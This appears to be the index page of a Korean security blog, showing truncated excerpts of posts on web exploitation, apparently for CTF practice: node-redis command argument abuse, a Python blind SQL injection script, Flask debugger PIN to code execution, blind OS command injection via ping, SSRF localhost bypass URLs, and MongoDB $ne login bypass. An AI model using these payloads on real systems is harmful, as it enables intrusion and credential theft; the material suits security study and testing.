본문 바로가기

분류 전체보기

(151)
node-redis Bug case command의 첫번째 인자에 array 타입이 올 경우 기존 방식과는 다르게 처리 되는것을 이용 // String Typekey, value, callback => Command(command, [key, value], callback) // Array Type[key, value] => Command(command, key, value) redis_client.send_command(log_query[0], log_query[1], function(err, result) 예시로 다음처럼 log_query를 get으로 받아 command를 실행시켜주는 함수가 있다. callback함수까지 있는 형식이지만 여기에 다음처럼 array형태로 줄경우 callback함수는 무시된다. ?log_query[0]=s..
mysql error based injection 잘 되어 있는 곳 https://johyungen.tistory.com/408
한글 blind sqlinjection from email import header from requests import get, head host = "input your host" password_length = 0 headers={"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8)"} while True: password_length += 1 query = f"admin' and char_length(upw) = {password_length}-- -" r = get(f"{host}/?uid={query}",headers=headers) if "exists" in r.text: break print(f"password length: {password_len..
python flask debugger pin취약점 문제 Werkzeug 는 Flask가 많이 사용하는 WSGI웹 애플리케이션 라이브러리이다. 디버깅시 사용하면 편하지만 RCE취약점으로 연결될수있다는 점이있다. app.run(host='0.0.0.0', port=8000, threaded=True, debug=True) 이런 문제의 특징은 debug기능이 true로 되어있다는것이다.(true로 할시 pin번호만 입력하면 interactive interpreter형식의 python을 사용할수 있게 된다) 콘솔에 접근하는 방법은 url:{port}/console 에 접근하거나 에러페이지에서 에러에 커서를 대면 우측의 콘솔버튼으로 접근이 가능하다. 하지만 pin번호를 알아야 하기에 이핀번호를 어케 알아내느냐? 보통 LFI취약점으로 파일을 읽을 수 있게된다. 다음 에..
docker windows 설치로 window멈춤(먹통) 현상 있을 때 docker에서 Hyper-V를 사용하는것같은데 나의 경우 vmware를 쓰고있기떄문에 docker설치시 hyper-v가 켜지면서 vmware가 충돌이 나서 계속 window crash가 나게 된다. docker를 선택할것인가 vmware를 선택할것인가 서어어어언택하라! 나는 vmware를 선택했기때문에 hyper-v를 껐더니 해결이 됐다. >dism.exe /Online /Disable-Feature:Microsoft-Hyper-V >bcdedit /set hypervisorlaunchtype off 다음 명령어을 실행 후 재부팅해주면 hyper-v가 꺼지면서 해결이 된다. (도커는 vmware안의 linux에서 쓰는걸로..)
Blind OS Command Injection OS Command Injection의 한 종류로 시스템 명령의 수행 결과 값을 알 수 없을 때 사용하는 방법이다. command injection성공후 리턴값을 볼수없기에 다른 방식으로 공격자에게 응답을 오도록 한다. 1.ping을 이용한 방법 ping -c 5 xxx.xxx.xxx.xxx : 대상 IP에 icmp 메세지를 5번 요청하는 명령어 다음처럼 command에 넣으면 대상ip를 나의 서버로 해두면 명령어가 잘먹혔을때 로그가 찍힐것이다. 다중명령어 사용법 등 링크참조 ---------------틈새시장------------------ 이사람 정말 설명을 잘해뒀다. https://bpsecblog.wordpress.com/2016/10/05/command_injection_02/ 엄마보고싶다(2)..
SSRF localhost, 127.0.0.1 bypass http://vcap.me:1530 http://0x7f.0x00.0x00.0x01:1530 http://0x7f000001:1530 http://2130706433:1530 http://Localhost:1530 고수가 우회하는법 http://127.0.0.1 http://0.0.0.0 http://localhost http://[::] http://0000::1 http://spoofed.burpcollaborator.net http://localtest.me http://localhost.hahwul.com http://127.127.127.127 http://127.0.1.3 http://127.0.0.0 http://0/ http://127.1 http://127.0.1 http://213070..
MongoDB_Injection 안쓰면 항상 까먹기때문에 정리해둔다. 비교연산 이용 $eq 지정된 값과 같은 값을 찾습니다. (equal) $gt 지정된 값보다 큰 값을 찾습니다. (greater than) $gte 지정된 값보다 크거나 같은 값을 찾습니다. (greater than equal) $in 배열 안의 값들과 일치하는 값을 찾습니다. (in) $lt 지정된 값보다 작은 값을 찾습니다. (less than) $lte 지정된 값보다 작거나 같은 값을 찾습니다. (less than equal) $ne 지정된 값과 같지 않은 값을 찾습니다. (not equal) $nin 배열 안의 값들과 일치하지 않는 값을 찾습니다. (not in) {"id": {"$ne":""}, "pw": {"$ne":""}}​ 다음처럼 $ne와 같은 비교연산..